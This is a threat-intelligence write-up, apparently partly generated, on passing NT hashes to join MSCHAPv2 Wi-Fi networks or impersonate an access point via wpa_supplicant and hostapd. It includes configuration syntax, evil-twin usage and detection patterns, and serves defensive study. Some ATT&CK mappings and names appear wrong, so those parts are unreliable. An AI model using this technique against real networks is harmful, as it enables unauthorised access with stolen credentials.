Full Report
Thanks to a tweet Dominic responded to, I saw someone mention Passing-the-hash when I think they actually meant relay. The terminology can be confusing for sure, however, it made me realise that I had never Passed-the-hash with a Wi-Fi network. So having learnt my lesson from previous projects I first made sure this was possible for NT -> MSCHAP by looking at the RFC. 8.1. GenerateNTResponse() GenerateNTResponse( IN 16-octet AuthenticatorChallenge, IN 16-octet PeerChallenge, IN 0-to-256-char UserName, IN 0-to-256-unicode-char Password, OUT 24-octet Response ) { 8-octet Challenge 16-octet PasswordHash ChallengeHash( PeerChallenge, AuthenticatorChallenge, UserName, giving Challenge) NtPasswordHash( Password, giving PasswordHash ) ChallengeResponse( Challenge, PasswordHash, giving Response ) } Looks like you can! As you can see in the above, the ChallengeResponse is created using the NT hash and not the password. I then checked wpa_supplicant to see if this was not a feature already, and it turns out it is! Looking at the wpa_supplicant configuration file it says:
Analysis Summary
# Tool/Technique: Passing-the-Hash over Wi-Fi (MSCHAP)
## Overview
This summary details the technique of leveraging pre-compromised NT hashes (or LM hashes, though the focus is on NT hashes for MSCHAPv2) to authenticate to Wi-Fi networks that utilize EAP methods like PEAP/TTLS with MSCHAPv2, bypassing the need for the plaintext password. This technique applies to both the supplicant (client) side and the authenticator (AP/Evil Twin) side, as both sides can utilize the NT hash directly in the authentication exchange defined by relevant RFCs (specifically RFC 2759 for MSCHAP initiation).
## Technical Details
- Type: Technique
- Platform: Client operating systems supporting `wpa_supplicant` (Linux/Unix-like), Access Points using compatible EAP frameworks (e.g., hostapd).
- Capabilities: Authenticating to MSCHAPv2-protected EAP wireless networks using the target's NT hash instead of the plaintext password, provided the configuration allows hash input.
- First Seen: The article describes leveraging existing functionality discovered around October 2020.
## MITRE ATT&CK Mapping
While this specific scenario maps closely to Access Authentication bypass, it primarily relates to credential usage and network access.
- **T1558 - Steal or Forge Kerberos Tickets** (Conceptual link to hash usage, though this is MSCHAP)
- *(Note: Direct MSCHAPv2/Wi-Fi hash relay doesn't have a precise single mapping, but it shares characteristics with credential misuse.)*
- **T1110 - Brute Force** (If the attacker is trying to crack hashes to apply this technique, though the technique itself is authentication bypass)
- **T1078.003 - Valid Accounts: Local Accounts** (If machine hashes are used for machine authentication)
For the Evil Twin scenario where the attacker acts as the AP:
- **T1557 - Man-in-the-Middle**
- **T1557.001 - Man-in-the-Middle: Unsecured Infrastructure** (In the context of compromising wireless access, although the technique relies on hash knowledge).
## Functionality
### Core Capabilities
1. **Client Authentication using Hash:** A supplicant (client) can be configured in tools like `wpa_supplicant` to use a pre-computed NT hash (`hash:<NT_HASH>`) directly in the configuration file for EAP methods relying on MSCHAPv2 (PEAP, TTLS). This leverages the `GenerateNTResponse()` function defined in RFCs, which uses the NT hash directly.
2. **Authenticator Impersonation using Hash:** An attacker running an Access Point (like `hostapd`) can respond to the client's authentication request using the target's NT hash directly in the `GenerateAuthenticatorResponse()` process, again circumventing the need for the plaintext password.
### Advanced Features
* **Machine Account Exploitation:** The technique is noted as particularly useful when machine accounts authenticate to Wi-Fi, as their hashes might be considered more stable or harder to crack than user passwords, yet they can still be dumped and reused for network access.
* **Evil Twin Setup:** An attacker can set up a malicious AP (Evil Twin) configured to use known user NT hashes. If a domain user attempts to connect (and mutual authentication permits connecting despite certificate issues, potentially exploiting older CVEs like CVE-2019-6203), the attacker's AP can authenticate successfully using the stored hash.
## Indicators of Compromise
This technique primarily relies on compromised credentials (hashes) rather than specific malware files.
- File Hashes: N/A (Relies on pre-existing hashes, e.g., from tools like Mimikatz).
- File Names: `wpa_supplicant.conf`, `hostapd.conf`.
- Registry Keys: N/A
- Network Indicators: Malicious Wi-Fi SSIDs imitating legitimate corporate networks (Evil Twin). All network traffic during the EAP exchange will show MSCHAPv2 challenge/response packets, but the key identifier is the hash being used instead of password input.
- Behavioral Indicators: Use of specific syntax (`hash:<NT_HASH>`) in wireless configuration profiles for authentication.
## Associated Threat Actors
This technique is commonly associated with penetration testers and advanced threat actors who perform internal network reconnaissance and privilege escalation through credential harvesting (e.g., actors using post-exploitation frameworks that retrieve credentials from memory). General threat actors often employ similar hash reuse techniques against SMB/WinRM (Passing-the-Hash), making this a logical extension for Wi-Fi access.
## Detection Methods
- Signature-based detection: Detecting configuration files (`wpa_supplicant.conf` or `hostapd.conf`) containing the `hash:` prefix followed by a 32-character hexadecimal string in authentication fields.
- Behavioral detection: Monitoring EAP/RADIUS server logs for authentication success events that utilized MSCHAPv2 where the client/server response structure indicates direct hash usage rather than password derivation.
- YARA rules: Could be written to search configuration files for the specific syntax patterns noted.
## Mitigation Strategies
- **Disable MSCHAPv2/PEAP/TTLS for Wi-Fi:** Where possible, migrate Wi-Fi authentication to stronger, hash-resistant mechanisms (e.g., EAP-TLS utilizing certificates for mutual authentication, which avoids reliance on password/hash knowledge).
- **Certificate Pinning/Strict Validation:** Configure supplicants to strictly enforce certificate validation against corporate CAs to mitigate Evil Twin attacks, even if the hash is known.
- **Credential Protection:** Implement solutions that prevent the dumping of NT hashes from memory (e.g., LSA protection mechanisms).
- **Network Hardening:** Use robust, modern WPA3/WPA2 standards that minimize reliance on legacy EAP protocols vulnerable to hash exploitation.
## Related Tools/Techniques
- **Passing-the-Hash (General):** MS-based authentication bypass over protocols like SMB or WinRM.
- **Relaying/Relay Attacks:** Where captured credentials (hashes) are immediately used to establish a connection to a third party (often confused with PtH).
- **Spock’s Evil Twin:** Mentioned in the text as the type of malicious AP used in the second scenario.